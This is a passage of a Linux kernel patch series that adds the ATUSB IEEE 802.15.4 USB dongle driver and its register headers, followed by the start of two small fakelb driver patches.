RG_XOSC_CTRL (0x12) +#define SR_XTAL_TRIM 0x12, 0x0f, 0 +#define SR_XTAL_MODE 0x12, 0xf0, 4 +#define RG_RX_SYN (0x15) +#define SR_RX_PDT_LEVEL 0x15, 0x0f, 0 +#define SR_RESERVED_15_2 0x15, 0x70, 4 +#define SR_RX_PDT_DIS 0x15, 0x80, 7 +#define RG_XAH_CTRL_1 (0x17) +#define SR_RESERVED_17_8 0x17, 0x01, 0 +#define SR_AACK_PROM_MODE 0x17, 0x02, 1 +#define SR_AACK_ACK_TIME 0x17, 0x04, 2 +#define SR_RESERVED_17_5 0x17, 0x08, 3 +#define SR_AACK_UPLD_RES_FT 0x17, 0x10, 4 +#define SR_AACK_FLTR_RES_FT 0x17, 0x20, 5 +#define SR_CSMA_LBT_MODE 0x17, 0x40, 6 +#define SR_RESERVED_17_1 0x17, 0x80, 7 +#define RG_FTN_CTRL (0x18) +#define SR_RESERVED_18_2 0x18, 0x7f, 0 +#define SR_FTN_START 0x18, 0x80, 7 +#define RG_PLL_CF (0x1a) +#define SR_RESERVED_1a_2 0x1a, 0x7f, 0 +#define SR_PLL_CF_START 0x1a, 0x80, 7 +#define RG_PLL_DCU (0x1b) +#define SR_RESERVED_1b_3 0x1b, 0x3f, 0 +#define SR_RESERVED_1b_2 0x1b, 0x40, 6 +#define SR_PLL_DCU_START 0x1b, 0x80, 7 +#define RG_PART_NUM (0x1c) +#define SR_PART_NUM 0x1c, 0xff, 0 +#define RG_VERSION_NUM (0x1d) +#define SR_VERSION_NUM 0x1d, 0xff, 0 +#define RG_MAN_ID_0 (0x1e) +#define SR_MAN_ID_0 0x1e, 0xff, 0 +#define RG_MAN_ID_1 (0x1f) +#define SR_MAN_ID_1 0x1f, 0xff, 0 +#define RG_SHORT_ADDR_0 (0x20) +#define SR_SHORT_ADDR_0 0x20, 0xff, 0 +#define RG_SHORT_ADDR_1 (0x21) +#define SR_SHORT_ADDR_1 0x21, 0xff, 0 +#define RG_PAN_ID_0 (0x22) +#define SR_PAN_ID_0 0x22, 0xff, 0 +#define RG_PAN_ID_1 (0x23) +#define SR_PAN_ID_1 0x23, 0xff, 0 +#define RG_IEEE_ADDR_0 (0x24) +#define SR_IEEE_ADDR_0 0x24, 0xff, 0 +#define RG_IEEE_ADDR_1 (0x25) +#define SR_IEEE_ADDR_1 0x25, 0xff, 0 +#define RG_IEEE_ADDR_2 (0x26) +#define SR_IEEE_ADDR_2 0x26, 0xff, 0 +#define RG_IEEE_ADDR_3 (0x27) +#define SR_IEEE_ADDR_3 0x27, 0xff, 0 +#define RG_IEEE_ADDR_4 (0x28) +#define SR_IEEE_ADDR_4 0x28, 0xff, 0 +#define RG_IEEE_ADDR_5 (0x29) +#define SR_IEEE_ADDR_5 0x29, 0xff, 0 +#define RG_IEEE_ADDR_6 (0x2a) +#define SR_IEEE_ADDR_6 0x2a, 0xff, 0 +#define RG_IEEE_ADDR_7 (0x2b) +#define SR_IEEE_ADDR_7 0x2b, 0xff, 0 +#define RG_XAH_CTRL_0 (0x2c) +#define SR_SLOTTED_OPERATION 0x2c, 0x01, 0 +#define SR_MAX_CSMA_RETRIES 0x2c, 0x0e, 1 +#define SR_MAX_FRAME_RETRIES 0x2c, 0xf0, 4 +#define RG_CSMA_SEED_0 (0x2d) +#define SR_CSMA_SEED_0 0x2d, 0xff, 0 +#define RG_CSMA_SEED_1 (0x2e) +#define SR_CSMA_SEED_1 0x2e, 0x07, 0 +#define SR_AACK_I_AM_COORD 0x2e, 0x08, 3 +#define SR_AACK_DIS_ACK 0x2e, 0x10, 4 +#define SR_AACK_SET_PD 0x2e, 0x20, 5 +#define SR_AACK_FVN_MODE 0x2e, 0xc0, 6 +#define RG_CSMA_BE (0x2f) +#define SR_MIN_BE 0x2f, 0x0f, 0 +#define SR_MAX_BE 0x2f, 0xf0, 4 + +#define CMD_REG 0x80 +#define CMD_REG_MASK 0x3f +#define CMD_WRITE 0x40 +#define CMD_FB 0x20 + +#define IRQ_BAT_LOW BIT(7) +#define IRQ_TRX_UR BIT(6) +#define IRQ_AMI BIT(5) +#define IRQ_CCA_ED BIT(4) +#define IRQ_TRX_END BIT(3) +#define IRQ_RX_START BIT(2) +#define IRQ_PLL_UNL BIT(1) +#define IRQ_PLL_LOCK BIT(0) + +#define IRQ_ACTIVE_HIGH 0 +#define IRQ_ACTIVE_LOW 1 + +#define STATE_P_ON 0x00 /* BUSY */ +#define STATE_BUSY_RX 0x01 +#define STATE_BUSY_TX 0x02 +#define STATE_FORCE_TRX_OFF 0x03 +#define STATE_FORCE_TX_ON 0x04 /* IDLE */ +/* 0x05 */ /* INVALID_PARAMETER */ +#define STATE_RX_ON 0x06 +/* 0x07 */ /* SUCCESS */ +#define STATE_TRX_OFF 0x08 +#define STATE_TX_ON 0x09 +/* 0x0a - 0x0e */ /* 0x0a - UNSUPPORTED_ATTRIBUTE */ +#define STATE_SLEEP 0x0F +#define STATE_PREP_DEEP_SLEEP 0x10 +#define STATE_BUSY_RX_AACK 0x11 +#define STATE_BUSY_TX_ARET 0x12 +#define STATE_RX_AACK_ON 0x16 +#define STATE_TX_ARET_ON 0x19 +#define STATE_RX_ON_NOCLK 0x1C +#define STATE_RX_AACK_ON_NOCLK 0x1D +#define STATE_BUSY_RX_AACK_NOCLK 0x1E +#define STATE_TRANSITION_IN_PROGRESS 0x1F + +#define TRX_STATE_MASK (0x1F) + +#endif /* !_AT86RF230_H */ diff --git a/drivers/net/ieee802154/atusb.c b/drivers/net/ieee802154/atusb.c new file mode 100644 index 000000000000..ea1259ef8508 --- /dev/null +++ b/drivers/net/ieee802154/atusb.c @@ -0,0 +1,692 @@ +/* + * atusb.c - Driver for the ATUSB IEEE 802.15.4 dongle + * + * Written 2013 by Werner Almesberger + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation, version 2 + * + * Based on at86rf230.c and spi_atusb.c. + * at86rf230.c is + * Copyright (C) 2009 Siemens AG + * Written by: Dmitry Eremin-Solenikov + * + * spi_atusb.c is + * Copyright (c) 2011 Richard Sharpe + * Copyright (c) 2011 Stefan Schmidt + * Copyright (c) 2011 Werner Almesberger + * + * USB initialization is + * Copyright (c) 2013 Alexander Aring + */ + +#include +#include +#include +#include +#include +#include + +#include +#include + +#include "at86rf230.h" +#include "atusb.h" + +#define ATUSB_JEDEC_ATMEL 0x1f /* JEDEC manufacturer ID */ + +#define ATUSB_NUM_RX_URBS 4 /* allow for a bit of local latency */ +#define ATUSB_ALLOC_DELAY_MS 100 /* delay after failed allocation */ +#define ATUSB_TX_TIMEOUT_MS 200 /* on the air timeout */ + +struct atusb { + struct ieee802154_hw *hw; + struct usb_device *usb_dev; + int shutdown; /* non-zero if shutting down */ + int err; /* set by first error */ + + /* RX variables */ + struct delayed_work work; /* memory allocations */ + struct usb_anchor idle_urbs; /* URBs waiting to be submitted */ + struct usb_anchor rx_urbs; /* URBs waiting for reception */ + + /* TX variables */ + struct usb_ctrlrequest tx_dr; + struct urb *tx_urb; + struct sk_buff *tx_skb; + uint8_t tx_ack_seq; /* current TX ACK sequence number */ +}; + +/* at86rf230.h defines values as tuples. We use the more + * traditional style of having registers and or-able values. SR_REG extracts + * the register number. SR_VALUE uses the shift to prepare a value accordingly. + */ + +#define __SR_REG(reg, mask, shift) (reg) +#define SR_REG(sr) __SR_REG(sr) + +#define __SR_VALUE(reg, mask, shift, val) ((val) << (shift)) +#define SR_VALUE(sr, val) __SR_VALUE(sr, (val)) + +/* ----- USB commands without data ----------------------------------------- */ + +/* To reduce the number of error checks in the code, we record the first error + * in atusb->err and reject all subsequent requests until the error is cleared. + */ + +static int atusb_control_msg(struct atusb *atusb, unsigned int pipe, + __u8 request, __u8 requesttype, + __u16 value, __u16 index, + void *data, __u16 size, int timeout) +{ + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + if (atusb->err) + return atusb->err; + + ret = usb_control_msg(usb_dev, pipe, request, requesttype, + value, index, data, size, timeout); + if (ret < 0) { + atusb->err = ret; + dev_err(&usb_dev->dev, + "atusb_control_msg: req 0x%02x val 0x%x idx 0x%x, error %d\n", + request, value, index, ret); + } + return ret; +} + +static int atusb_command(struct atusb *atusb, uint8_t cmd, uint8_t arg) +{ + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_command: cmd = 0x%x\n", cmd); + return atusb_control_msg(atusb, usb_sndctrlpipe(usb_dev, 0), + cmd, ATUSB_REQ_TO_DEV, arg, 0, NULL, 0, 1000); +} + +static int atusb_write_reg(struct atusb *atusb, uint8_t reg, uint8_t value) +{ + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_write_reg: 0x%02x <- 0x%02x\n", + reg, value); + return atusb_control_msg(atusb, usb_sndctrlpipe(usb_dev, 0), + ATUSB_REG_WRITE, ATUSB_REQ_TO_DEV, + value, reg, NULL, 0, 1000); +} + +static int atusb_read_reg(struct atusb *atusb, uint8_t reg) +{ + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + uint8_t value; + + dev_dbg(&usb_dev->dev, "atusb: reg = 0x%x\n", reg); + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_REG_READ, ATUSB_REQ_FROM_DEV, + 0, reg, &value, 1, 1000); + return ret >= 0 ? value : ret; +} + +static int atusb_get_and_clear_error(struct atusb *atusb) +{ + int err = atusb->err; + + atusb->err = 0; + return err; +} + +/* ----- skb allocation ---------------------------------------------------- */ + +#define MAX_PSDU 127 +#define MAX_RX_XFER (1 + MAX_PSDU + 2 + 1) /* PHR+PSDU+CRC+LQI */ + +#define SKB_ATUSB(skb) (*(struct atusb **)(skb)->cb) + +static void atusb_in(struct urb *urb); + +static int atusb_submit_rx_urb(struct atusb *atusb, struct urb *urb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + struct sk_buff *skb = urb->context; + int ret; + + if (!skb) { + skb = alloc_skb(MAX_RX_XFER, GFP_KERNEL); + if (!skb) { + dev_warn_ratelimited(&usb_dev->dev, + "atusb_in: can't allocate skb\n"); + return -ENOMEM; + } + skb_put(skb, MAX_RX_XFER); + SKB_ATUSB(skb) = atusb; + } + + usb_fill_bulk_urb(urb, usb_dev, usb_rcvbulkpipe(usb_dev, 1), + skb->data, MAX_RX_XFER, atusb_in, skb); + usb_anchor_urb(urb, &atusb->rx_urbs); + + ret = usb_submit_urb(urb, GFP_KERNEL); + if (ret) { + usb_unanchor_urb(urb); + kfree_skb(skb); + urb->context = NULL; + } + return ret; +} + +static void atusb_work_urbs(struct work_struct *work) +{ + struct atusb *atusb = + container_of(to_delayed_work(work), struct atusb, work); + struct usb_device *usb_dev = atusb->usb_dev; + struct urb *urb; + int ret; + + if (atusb->shutdown) + return; + + do { + urb = usb_get_from_anchor(&atusb->idle_urbs); + if (!urb) + return; + ret = atusb_submit_rx_urb(atusb, urb); + } while (!ret); + + usb_anchor_urb(urb, &atusb->idle_urbs); + dev_warn_ratelimited(&usb_dev->dev, + "atusb_in: can't allocate/submit URB (%d)\n", ret); + schedule_delayed_work(&atusb->work, + msecs_to_jiffies(ATUSB_ALLOC_DELAY_MS) + 1); +} + +/* ----- Asynchronous USB -------------------------------------------------- */ + +static void atusb_tx_done(struct atusb *atusb, uint8_t seq) +{ + struct usb_device *usb_dev = atusb->usb_dev; + uint8_t expect = atusb->tx_ack_seq; + + dev_dbg(&usb_dev->dev, "atusb_tx_done (0x%02x/0x%02x)\n", seq, expect); + if (seq == expect) { + /* TODO check for ifs handling in firmware */ + ieee802154_xmit_complete(atusb->hw, atusb->tx_skb, false); + } else { + /* TODO I experience this case when atusb has a tx complete + * irq before probing, we should fix the firmware it's an + * unlikely case now that seq == expect is then true, but can + * happen and fail with a tx_skb = NULL; + */ + ieee802154_wake_queue(atusb->hw); + if (atusb->tx_skb) + dev_kfree_skb_irq(atusb->tx_skb); + } +} + +static void atusb_in_good(struct urb *urb) +{ + struct usb_device *usb_dev = urb->dev; + struct sk_buff *skb = urb->context; + struct atusb *atusb = SKB_ATUSB(skb); + uint8_t len, lqi; + + if (!urb->actual_length) { + dev_dbg(&usb_dev->dev, "atusb_in: zero-sized URB ?\n"); + return; + } + + len = *skb->data; + + if (urb->actual_length == 1) { + atusb_tx_done(atusb, len); + return; + } + + if (len + 1 > urb->actual_length - 1) { + dev_dbg(&usb_dev->dev, "atusb_in: frame len %d+1 > URB %u-1\n", + len, urb->actual_length); + return; + } + + if (!ieee802154_is_valid_psdu_len(len)) { + dev_dbg(&usb_dev->dev, "atusb_in: frame corrupted\n"); + return; + } + + lqi = skb->data[len + 1]; + dev_dbg(&usb_dev->dev, "atusb_in: rx len %d lqi 0x%02x\n", len, lqi); + skb_pull(skb, 1); /* remove PHR */ + skb_trim(skb, len); /* get payload only */ + ieee802154_rx_irqsafe(atusb->hw, skb, lqi); + urb->context = NULL; /* skb is gone */ +} + +static void atusb_in(struct urb *urb) +{ + struct usb_device *usb_dev = urb->dev; + struct sk_buff *skb = urb->context; + struct atusb *atusb = SKB_ATUSB(skb); + + dev_dbg(&usb_dev->dev, "atusb_in: status %d len %d\n", + urb->status, urb->actual_length); + if (urb->status) { + if (urb->status == -ENOENT) { /* being killed */ + kfree_skb(skb); + urb->context = NULL; + return; + } + dev_dbg(&usb_dev->dev, "atusb_in: URB error %d\n", urb->status); + } else { + atusb_in_good(urb); + } + + usb_anchor_urb(urb, &atusb->idle_urbs); + if (!atusb->shutdown) + schedule_delayed_work(&atusb->work, 0); +} + +/* ----- URB allocation/deallocation --------------------------------------- */ + +static void atusb_free_urbs(struct atusb *atusb) +{ + struct urb *urb; + + while (1) { + urb = usb_get_from_anchor(&atusb->idle_urbs); + if (!urb) + break; + if (urb->context) + kfree_skb(urb->context); + usb_free_urb(urb); + } +} + +static int atusb_alloc_urbs(struct atusb *atusb, int n) +{ + struct urb *urb; + + while (n) { + urb = usb_alloc_urb(0, GFP_KERNEL); + if (!urb) { + atusb_free_urbs(atusb); + return -ENOMEM; + } + usb_anchor_urb(urb, &atusb->idle_urbs); + n--; + } + return 0; +} + +/* ----- IEEE 802.15.4 interface operations -------------------------------- */ + +static void atusb_xmit_complete(struct urb *urb) +{ + dev_dbg(&urb->dev->dev, "atusb_xmit urb completed"); +} + +static int atusb_xmit(struct ieee802154_hw *hw, struct sk_buff *skb) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + dev_dbg(&usb_dev->dev, "atusb_xmit (%d)\n", skb->len); + atusb->tx_skb = skb; + atusb->tx_ack_seq++; + atusb->tx_dr.wIndex = cpu_to_le16(atusb->tx_ack_seq); + atusb->tx_dr.wLength = cpu_to_le16(skb->len); + + usb_fill_control_urb(atusb->tx_urb, usb_dev, + usb_sndctrlpipe(usb_dev, 0), + (unsigned char *)&atusb->tx_dr, skb->data, + skb->len, atusb_xmit_complete, NULL); + ret = usb_submit_urb(atusb->tx_urb, GFP_ATOMIC); + dev_dbg(&usb_dev->dev, "atusb_xmit done (%d)\n", ret); + return ret; +} + +static int atusb_channel(struct ieee802154_hw *hw, u8 page, u8 channel) +{ + struct atusb *atusb = hw->priv; + int ret; + + /* This implicitly sets the CCA (Clear Channel Assessment) mode to 0, + * "Mode 3a, Carrier sense OR energy above threshold". + * We should probably make this configurable. @@@ + */ + ret = atusb_write_reg(atusb, RG_PHY_CC_CCA, channel); + if (ret < 0) + return ret; + msleep(1); /* @@@ ugly synchronization */ + return 0; +} + +static int atusb_ed(struct ieee802154_hw *hw, u8 *level) +{ + /* @@@ not used by the stack yet */ + *level = 0; + return 0; +} + +static int atusb_set_hw_addr_filt(struct ieee802154_hw *hw, + struct ieee802154_hw_addr_filt *filt, + unsigned long changed) +{ + struct atusb *atusb = hw->priv; + struct device *dev = &atusb->usb_dev->dev; + uint8_t reg; + + if (changed & IEEE802154_AFILT_SADDR_CHANGED) { + u16 addr = le16_to_cpu(filt->short_addr); + + dev_vdbg(dev, "atusb_set_hw_addr_filt called for saddr\n"); + atusb_write_reg(atusb, RG_SHORT_ADDR_0, addr); + atusb_write_reg(atusb, RG_SHORT_ADDR_1, addr >> 8); + } + + if (changed & IEEE802154_AFILT_PANID_CHANGED) { + u16 pan = le16_to_cpu(filt->pan_id); + + dev_vdbg(dev, "atusb_set_hw_addr_filt called for pan id\n"); + atusb_write_reg(atusb, RG_PAN_ID_0, pan); + atusb_write_reg(atusb, RG_PAN_ID_1, pan >> 8); + } + + if (changed & IEEE802154_AFILT_IEEEADDR_CHANGED) { + u8 i, addr[IEEE802154_EXTENDED_ADDR_LEN]; + + memcpy(addr, &filt->ieee_addr, IEEE802154_EXTENDED_ADDR_LEN); + dev_vdbg(dev, "atusb_set_hw_addr_filt called for IEEE addr\n"); + for (i = 0; i < 8; i++) + atusb_write_reg(atusb, RG_IEEE_ADDR_0 + i, addr[i]); + } + + if (changed & IEEE802154_AFILT_PANC_CHANGED) { + dev_vdbg(dev, + "atusb_set_hw_addr_filt called for panc change\n"); + reg = atusb_read_reg(atusb, SR_REG(SR_AACK_I_AM_COORD)); + if (filt->pan_coord) + reg |= SR_VALUE(SR_AACK_I_AM_COORD, 1); + else + reg &= ~SR_VALUE(SR_AACK_I_AM_COORD, 1); + atusb_write_reg(atusb, SR_REG(SR_AACK_I_AM_COORD), reg); + } + + return atusb_get_and_clear_error(atusb); +} + +static int atusb_start(struct ieee802154_hw *hw) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + int ret; + + dev_dbg(&usb_dev->dev, "atusb_start\n"); + schedule_delayed_work(&atusb->work, 0); + atusb_command(atusb, ATUSB_RX_MODE, 1); + ret = atusb_get_and_clear_error(atusb); + if (ret < 0) + usb_kill_anchored_urbs(&atusb->idle_urbs); + return ret; +} + +static void atusb_stop(struct ieee802154_hw *hw) +{ + struct atusb *atusb = hw->priv; + struct usb_device *usb_dev = atusb->usb_dev; + + dev_dbg(&usb_dev->dev, "atusb_stop\n"); + usb_kill_anchored_urbs(&atusb->idle_urbs); + atusb_command(atusb, ATUSB_RX_MODE, 0); + atusb_get_and_clear_error(atusb); +} + +static struct ieee802154_ops atusb_ops = { + .owner = THIS_MODULE, + .xmit_async = atusb_xmit, + .ed = atusb_ed, + .set_channel = atusb_channel, + .start = atusb_start, + .stop = atusb_stop, + .set_hw_addr_filt = atusb_set_hw_addr_filt, +}; + +/* ----- Firmware and chip version information ----------------------------- */ + +static int atusb_get_and_show_revision(struct atusb *atusb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + unsigned char buffer[3]; + int ret; + + /* Get a couple of the ATMega Firmware values */ + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_ID, ATUSB_REQ_FROM_DEV, 0, 0, + buffer, 3, 1000); + if (ret >= 0) + dev_info(&usb_dev->dev, + "Firmware: major: %u, minor: %u, hardware type: %u\n", + buffer[0], buffer[1], buffer[2]); + + return ret; +} + +static int atusb_get_and_show_build(struct atusb *atusb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + char build[ATUSB_BUILD_SIZE + 1]; + int ret; + + ret = atusb_control_msg(atusb, usb_rcvctrlpipe(usb_dev, 0), + ATUSB_BUILD, ATUSB_REQ_FROM_DEV, 0, 0, + build, ATUSB_BUILD_SIZE, 1000); + if (ret >= 0) { + build[ret] = 0; + dev_info(&usb_dev->dev, "Firmware: build %s\n", build); + } + + return ret; +} + +static int atusb_get_and_show_chip(struct atusb *atusb) +{ + struct usb_device *usb_dev = atusb->usb_dev; + uint8_t man_id_0, man_id_1, part_num, version_num; + + man_id_0 = atusb_read_reg(atusb, RG_MAN_ID_0); + man_id_1 = atusb_read_reg(atusb, RG_MAN_ID_1); + part_num = atusb_read_reg(atusb, RG_PART_NUM); + version_num = atusb_read_reg(atusb, RG_VERSION_NUM); + + if (atusb->err) + return atusb->err; + + if ((man_id_1 << 8 | man_id_0) != ATUSB_JEDEC_ATMEL) { + dev_err(&usb_dev->dev, + "non-Atmel transceiver xxxx%02x%02x\n", + man_id_1, man_id_0); + goto fail; + } + if (part_num != 3) { + dev_err(&usb_dev->dev, + "unexpected transceiver, part 0x%02x version 0x%02x\n", + part_num, version_num); + goto fail; + } + + dev_info(&usb_dev->dev, "ATUSB: AT86RF231 version %d\n", version_num); + + return 0; + +fail: + atusb->err = -ENODEV; + return -ENODEV; +} + +/* ----- Setup ------------------------------------------------------------- */ + +static int atusb_probe(struct usb_interface *interface, + const struct usb_device_id *id) +{ + struct usb_device *usb_dev = interface_to_usbdev(interface); + struct ieee802154_hw *hw; + struct atusb *atusb = NULL; + int ret = -ENOMEM; + + hw = ieee802154_alloc_hw(sizeof(struct atusb), &atusb_ops); + if (!hw) + return -ENOMEM; + + atusb = hw->priv; + atusb->hw = hw; + atusb->usb_dev = usb_get_dev(usb_dev); + usb_set_intfdata(interface, atusb); + + atusb->shutdown = 0; + atusb->err = 0; + INIT_DELAYED_WORK(&atusb->work, atusb_work_urbs); + init_usb_anchor(&atusb->idle_urbs); + init_usb_anchor(&atusb->rx_urbs); + + if (atusb_alloc_urbs(atusb, ATUSB_NUM_RX_URBS)) + goto fail; + + atusb->tx_dr.bRequestType = ATUSB_REQ_TO_DEV; + atusb->tx_dr.bRequest = ATUSB_TX; + atusb->tx_dr.wValue = cpu_to_le16(0); + + atusb->tx_urb = usb_alloc_urb(0, GFP_ATOMIC); + if (!atusb->tx_urb) + goto fail; + + hw->parent = &usb_dev->dev; + hw->flags = IEEE802154_HW_TX_OMIT_CKSUM | IEEE802154_HW_AFILT; + + hw->phy->current_page = 0; + hw->phy->current_channel = 11; /* reset default */ + hw->phy->supported.channels[0] = 0x7FFF800; + ieee802154_random_extended_addr(&hw->phy->perm_extended_addr); + + atusb_command(atusb, ATUSB_RF_RESET, 0); + atusb_get_and_show_chip(atusb); + atusb_get_and_show_revision(atusb); + atusb_get_and_show_build(atusb); + ret = atusb_get_and_clear_error(atusb); + if (ret) { + dev_err(&atusb->usb_dev->dev, + "%s: initialization failed, error = %d\n", + __func__, ret); + goto fail; + } + + ret = ieee802154_register_hw(hw); + if (ret) + goto fail; + + /* If we just powered on, we're now in P_ON and need to enter TRX_OFF + * explicitly. Any resets after that will send us straight to TRX_OFF, + * making the command below redundant. + */ + atusb_write_reg(atusb, RG_TRX_STATE, STATE_FORCE_TRX_OFF); + msleep(1); /* reset => TRX_OFF, tTR13 = 37 us */ + +#if 0 + /* Calculating the maximum time available to empty the frame buffer + * on reception: + * + * According to [1], the inter-frame gap is + * R * 20 * 16 us + 128 us + * where R is a random number from 0 to 7. Furthermore, we have 20 bit + * times (80 us at 250 kbps) of SHR of the next frame before the + * transceiver begins storing data in the frame buffer. + * + * This yields a minimum time of 208 us between the last data of a + * frame and the first data of the next frame. This time is further + * reduced by interrupt latency in the atusb firmware. + * + * atusb currently needs about 500 us to retrieve a maximum-sized + * frame. We therefore have to allow reception of a new frame to begin + * while we retrieve the previous frame. + * + * [1] "JN-AN-1035 Calculating data rates in an IEEE 802.15.4-based + * network", Jennic 2006. + * http://www.jennic.com/download_file.php?supportFile=JN-AN-1035%20Calculating%20802-15-4%20Data%20Rates-1v0.pdf + */ + + atusb_write_reg(atusb, + SR_REG(SR_RX_SAFE_MODE), SR_VALUE(SR_RX_SAFE_MODE, 1)); +#endif + atusb_write_reg(atusb, RG_IRQ_MASK, 0xff); + + ret = atusb_get_and_clear_error(atusb); + if (!ret) + return 0; + + dev_err(&atusb->usb_dev->dev, + "%s: setup failed, error = %d\n", + __func__, ret); + + ieee802154_unregister_hw(hw); +fail: + atusb_free_urbs(atusb); + usb_kill_urb(atusb->tx_urb); + usb_free_urb(atusb->tx_urb); + usb_put_dev(usb_dev); + ieee802154_free_hw(hw); + return ret; +} + +static void atusb_disconnect(struct usb_interface *interface) +{ + struct atusb *atusb = usb_get_intfdata(interface); + + dev_dbg(&atusb->usb_dev->dev, "atusb_disconnect\n"); + + atusb->shutdown = 1; + cancel_delayed_work_sync(&atusb->work); + + usb_kill_anchored_urbs(&atusb->rx_urbs); + atusb_free_urbs(atusb); + usb_kill_urb(atusb->tx_urb); + usb_free_urb(atusb->tx_urb); + + ieee802154_unregister_hw(atusb->hw); + + ieee802154_free_hw(atusb->hw); + + usb_set_intfdata(interface, NULL); + usb_put_dev(atusb->usb_dev); + + pr_debug("atusb_disconnect done\n"); +} + +/* The devices we work with */ +static const struct usb_device_id atusb_device_table[] = { + { + .match_flags = USB_DEVICE_ID_MATCH_DEVICE | + USB_DEVICE_ID_MATCH_INT_INFO, + .idVendor = ATUSB_VENDOR_ID, + .idProduct = ATUSB_PRODUCT_ID, + .bInterfaceClass = USB_CLASS_VENDOR_SPEC + }, + /* end with null element */ + {} +}; +MODULE_DEVICE_TABLE(usb, atusb_device_table); + +static struct usb_driver atusb_driver = { + .name = "atusb", + .probe = atusb_probe, + .disconnect = atusb_disconnect, + .id_table = atusb_device_table, +}; +module_usb_driver(atusb_driver); + +MODULE_AUTHOR("Alexander Aring "); +MODULE_AUTHOR("Richard Sharpe "); +MODULE_AUTHOR("Stefan Schmidt "); +MODULE_AUTHOR("Werner Almesberger "); +MODULE_DESCRIPTION("ATUSB IEEE 802.15.4 Driver"); +MODULE_LICENSE("GPL"); diff --git a/drivers/net/ieee802154/atusb.h b/drivers/net/ieee802154/atusb.h new file mode 100644 index 000000000000..0690edcad57b --- /dev/null +++ b/drivers/net/ieee802154/atusb.h @@ -0,0 +1,84 @@ +/* + * atusb.h - Definitions shared between kernel and ATUSB firmware + * + * Written 2013 by Werner Almesberger + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License as + * published by the Free Software Foundation, version 2, or + * (at your option) any later version. + * + * This file should be identical for kernel and firmware. + * Kernel: drivers/net/ieee802154/atusb.h + * Firmware: ben-wpan/atusb/fw/include/atusb/atusb.h + */ + +#ifndef _ATUSB_H +#define _ATUSB_H + +#define ATUSB_VENDOR_ID 0x20b7 /* Qi Hardware*/ +#define ATUSB_PRODUCT_ID 0x1540 /* 802.15.4, device 0 */ + /* -- - - */ + +#define ATUSB_BUILD_SIZE 256 /* maximum build version/date message length */ + +/* Commands to our device. Make sure this is synced with the firmware */ +enum atusb_requests { + ATUSB_ID = 0x00, /* system status/control grp */ + ATUSB_BUILD, + ATUSB_RESET, + ATUSB_RF_RESET = 0x10, /* debug/test group */ + ATUSB_POLL_INT, + ATUSB_TEST, /* atusb-sil only */ + ATUSB_TIMER, + ATUSB_GPIO, + ATUSB_SLP_TR, + ATUSB_GPIO_CLEANUP, + ATUSB_REG_WRITE = 0x20, /* transceiver group */ + ATUSB_REG_READ, + ATUSB_BUF_WRITE, + ATUSB_BUF_READ, + ATUSB_SRAM_WRITE, + ATUSB_SRAM_READ, + ATUSB_SPI_WRITE = 0x30, /* SPI group */ + ATUSB_SPI_READ1, + ATUSB_SPI_READ2, + ATUSB_SPI_WRITE2_SYNC, + ATUSB_RX_MODE = 0x40, /* HardMAC group */ + ATUSB_TX, +}; + +/* Direction bRequest wValue wIndex wLength + * + * ->host ATUSB_ID - - 3 + * ->host ATUSB_BUILD - - #bytes + * host-> ATUSB_RESET - - 0 + * + * host-> ATUSB_RF_RESET - - 0 + * ->host ATUSB_POLL_INT - - 1 + * host-> ATUSB_TEST - - 0 + * ->host ATUSB_TIMER - - #bytes (6) + * ->host ATUSB_GPIO dir+data mask+p# 3 + * host-> ATUSB_SLP_TR - - 0 + * host-> ATUSB_GPIO_CLEANUP - - 0 + * + * host-> ATUSB_REG_WRITE value addr 0 + * ->host ATUSB_REG_READ - addr 1 + * host-> ATUSB_BUF_WRITE - - #bytes + * ->host ATUSB_BUF_READ - - #bytes + * host-> ATUSB_SRAM_WRITE - addr #bytes + * ->host ATUSB_SRAM_READ - addr #bytes + * + * host-> ATUSB_SPI_WRITE byte0 byte1 #bytes + * ->host ATUSB_SPI_READ1 byte0 - #bytes + * ->host ATUSB_SPI_READ2 byte0 byte1 #bytes + * ->host ATUSB_SPI_WRITE2_SYNC byte0 byte1 0/1 + * + * host-> ATUSB_RX_MODE on - 0 + * host-> ATUSB_TX flags ack_seq #bytes + */ + +#define ATUSB_REQ_FROM_DEV (USB_TYPE_VENDOR | USB_DIR_IN) +#define ATUSB_REQ_TO_DEV (USB_TYPE_VENDOR | USB_DIR_OUT) + +#endif /* !_ATUSB_H */ From 7e57905ba6c825f38f146b5f8974c2ce27f299bb Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:58 +0200 Subject: [PATCH 099/872] fakelb: creating two virtual phys per default This patch change the default virtual wpan phys of fakelb driver from one to two. To have one virtual phy makes no sense, because it need at least two virtual phy's to speak to each other. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ieee802154/fakelb.c b/drivers/net/ieee802154/fakelb.c index 230f7da02165..cc1c7df25009 100644 --- a/drivers/net/ieee802154/fakelb.c +++ b/drivers/net/ieee802154/fakelb.c @@ -27,7 +27,7 @@ #include #include -static int numlbs = 1; +static int numlbs = 2; struct fakelb_dev_priv { struct ieee802154_hw *hw; From 3186d3d7aec3b2f242abbc0a0219226e7705c905 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:59 +0200 Subject: [PATCH 100/872] fakelb: use list_for_each_entry_safe Iterate and removing items from a list, we should use list_for_each_entry_safe instead list_for_each_entry to avoid accidents by removing. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/fakelb.c | 4 ++-- 1 file changed, 2 